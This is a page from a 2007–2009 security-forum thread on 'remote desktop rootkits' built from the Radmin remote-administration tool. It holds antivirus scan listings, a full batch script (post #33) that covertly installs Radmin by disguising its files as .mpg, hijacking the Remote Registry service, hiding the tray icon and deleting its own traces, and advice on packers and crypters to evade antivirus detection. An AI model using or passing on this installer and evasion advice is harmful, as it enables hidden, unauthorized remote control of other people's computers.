Government Security
Network Security Resources

Jump to content

Photo

Remote Desktop Rootkits


  • This topic is locked This topic is locked
37 replies to this topic

#31 Marts McFly

Marts McFly

    Second Lieutenant

  • Second Lieutenant
  • 591 posts

Posted 29 April 2007 - 07:01 PM

Well ... nice rootkit ... really usefull ! But there is a Problem ...

AhnLab-V3 2007.4.28.0 04.27.2007 no virus found
AntiVir 7.4.0.15 04.28.2007 no virus found
Authentium 4.93.8 04.27.2007 no virus found
Avast 4.7.981.0 04.26.2007 no virus found
AVG 7.5.0.464 04.26.2007 Potentially harmful program RemoteAdmin.O
BitDefender 7.2 04.28.2007 no virus found
CAT-QuickHeal 9.00 04.27.2007 no virus found
ClamAV devel-20070416 04.28.2007 no virus found
DrWeb 4.33 04.28.2007 no virus found
eSafe 7.0.15.0 04.27.2007 no virus found
eTrust-Vet 30.7.3601 04.27.2007 no virus found
Ewido 4.0 04.27.2007 no virus found
FileAdvisor 1 04.28.2007 no virus found
Fortinet 2.85.0.0 04.28.2007 RAT/RAdmin
F-Prot 4.3.2.48 04.27.2007 W32/RemoteAdmin.A
F-Secure 6.70.13030.0 04.28.2007 Backdoor.Win32.RA-based.z
Ikarus T3.1.1.5 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
Kaspersky 4.0.2.24 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
McAfee 5019 04.27.2007 potentially unwanted program RemAdm-RemoteAdmin
Microsoft 1.2405 04.28.2007 RemoteAccess:Win32/RServer (threat-c)
NOD32v2 2225 04.27.2007 Win32/RemoteAdmin
Norman 5.80.02 04.27.2007 no virus found
Panda 9.0.0.4 04.28.2007 no virus found
Prevx1 V2 04.28.2007 no virus found
Sophos 4.16.0 04.23.2007 RemoteAdmin
Sunbelt 2.2.907.0 04.19.2007 no virus found
Symantec 10 04.28.2007 Remacc.Radmin
TheHacker 6.1.6.095 04.15.2007 no virus found
VBA32 3.11.4 04.28.2007 Backdoor.Win32.RA-based.v#1
VirusBuster 4.3.7:9 04.27.2007 Backdoor.Radmin.Y
Webwasher-Gateway 6.0.1 04.28.2007 Riskware.RemoteAdmin.R


maybe if you want you can make a Access Remote PC-rootkit :D



What do you expect? He posted this almost 2 years ago! I'm suprised more AV's didn't pick it up.
Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

#32 loloko

loloko

    Private

  • Members
  • 11 posts

Posted 30 April 2007 - 07:27 AM

Well ... nice rootkit ... really usefull ! But there is a Problem ...

AhnLab-V3 2007.4.28.0 04.27.2007 no virus found
AntiVir 7.4.0.15 04.28.2007 no virus found
Authentium 4.93.8 04.27.2007 no virus found
Avast 4.7.981.0 04.26.2007 no virus found
AVG 7.5.0.464 04.26.2007 Potentially harmful program RemoteAdmin.O
BitDefender 7.2 04.28.2007 no virus found
CAT-QuickHeal 9.00 04.27.2007 no virus found
ClamAV devel-20070416 04.28.2007 no virus found
DrWeb 4.33 04.28.2007 no virus found
eSafe 7.0.15.0 04.27.2007 no virus found
eTrust-Vet 30.7.3601 04.27.2007 no virus found
Ewido 4.0 04.27.2007 no virus found
FileAdvisor 1 04.28.2007 no virus found
Fortinet 2.85.0.0 04.28.2007 RAT/RAdmin
F-Prot 4.3.2.48 04.27.2007 W32/RemoteAdmin.A
F-Secure 6.70.13030.0 04.28.2007 Backdoor.Win32.RA-based.z
Ikarus T3.1.1.5 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
Kaspersky 4.0.2.24 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
McAfee 5019 04.27.2007 potentially unwanted program RemAdm-RemoteAdmin
Microsoft 1.2405 04.28.2007 RemoteAccess:Win32/RServer (threat-c)
NOD32v2 2225 04.27.2007 Win32/RemoteAdmin
Norman 5.80.02 04.27.2007 no virus found
Panda 9.0.0.4 04.28.2007 no virus found
Prevx1 V2 04.28.2007 no virus found
Sophos 4.16.0 04.23.2007 RemoteAdmin
Sunbelt 2.2.907.0 04.19.2007 no virus found
Symantec 10 04.28.2007 Remacc.Radmin
TheHacker 6.1.6.095 04.15.2007 no virus found
VBA32 3.11.4 04.28.2007 Backdoor.Win32.RA-based.v#1
VirusBuster 4.3.7:9 04.27.2007 Backdoor.Radmin.Y
Webwasher-Gateway 6.0.1 04.28.2007 Riskware.RemoteAdmin.R


maybe if you want you can make a Access Remote PC-rootkit :D



What do you expect? He posted this almost 2 years ago! I'm suprised more AV's didn't pick it up.


Hello,

Radmin is a regular software, so all avs compagnies doesn't classified this tool as a "wild" backdoor.

#33 dkollf

dkollf

    Private

  • Members
  • 2 posts

Posted 16 June 2007 - 09:07 AM

See my batfile

---------------------------------------------------------------
@echo off
net stop r_server
net stop radmm
net stop PlugPlayExt
net stop RemoteRegistry
copy 1.mpg %windir%\System32\regsvcs.exe
copy 2.mpg %windir%\System32\raddrv.dll
copy 3.mpg %windir%\System32\AdmDll.dll
copy 4.mpg %windir%\System32\serv.exe
copy 5.mpg %windir%\System32\dtreg.exe
serv remove RemoteRegistry /y
serv.exe install RemoteRegistry /b:"%windir%\system32\regsvcs.exe /service" /n:"Remote Registry Service" /i:yes /u:LocalSystem /s:auto
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0\Server
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin\v1.01
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin\v1.01\ViewType
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SOFTWARE\RAdmin\v1.01\ViewType\Data=01f699b0575c1380186ff3fc68838ebfca4a9c5eccf98e7c3172ae28315e990b9fa489
61fc0ce34750e30608f0552b80b3d4c0a8153627f05f8ef7b0f5b04bdb
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=35e40000
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=1da3829a0bab2b4b1bd98142aa93136a
dtreg.exe -Quiet -Set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0x00000002
dtreg.exe -Quiet -Set REG_SZ \HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry\Description=Allow Remote Registry Contral。
echo Registry settings changed...
echo Starting Radmin Service now
net start RemoteRegistry
del %windir%\System32\*.mpg
del %windir%\System32\*.bat

#34 xaiver

xaiver

    Private

  • Members
  • 8 posts

Posted 06 June 2009 - 12:16 AM

is there anybody who can upload a modded radmin? where u only have to start a bat file and then t installs and you can connect then by radmin viewer im looking for that

#35 squirl

squirl

    Private First Class

  • Members
  • 64 posts

Posted 06 June 2009 - 05:22 AM

omg read the first post... u got everything there...
read it and u can do it by rourself

#36 AdmiralB

AdmiralB

    Specialist

  • Sergeant Major
  • 338 posts

Posted 06 June 2009 - 08:05 PM

well regarding virus scans,

you can try to mask the rootkits with different packers crypters and morphing apps

#37 GhostShell

GhostShell

    Staff Sergeant

  • Members
  • 345 posts

Posted 08 June 2009 - 07:37 AM

well regarding virus scans,

you can try to mask the rootkits with different packers crypters and morphing apps


Not only can you do that but radmin is very easy to modify, i modded everything in mine. And it never gets removed or caught ever. The RemoteRegistry mod batch file pasted above made me laugh I use similar tricks but what a lame service to chose. What admin would not stop that?
http://pcsubject.com/ <- My new Blog

"As a young boy, I was taught in high school that hacking was cool." -Kevin Mitnick

"It's easy to point and click programs, but thats not real hacking." -illwill

#38 Ryan M

Ryan M

    First Sergeant

  • Second Lieutenant
  • 1,740 posts

Posted 08 June 2009 - 07:31 PM

Do not bump old topics. Closed.
There is no security on this earth. Only opportunity.
-Douglas MacArthur

GSO Compiled Exploit Database
----------------------------------------
[b]Mod at GovernmentSecurity




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users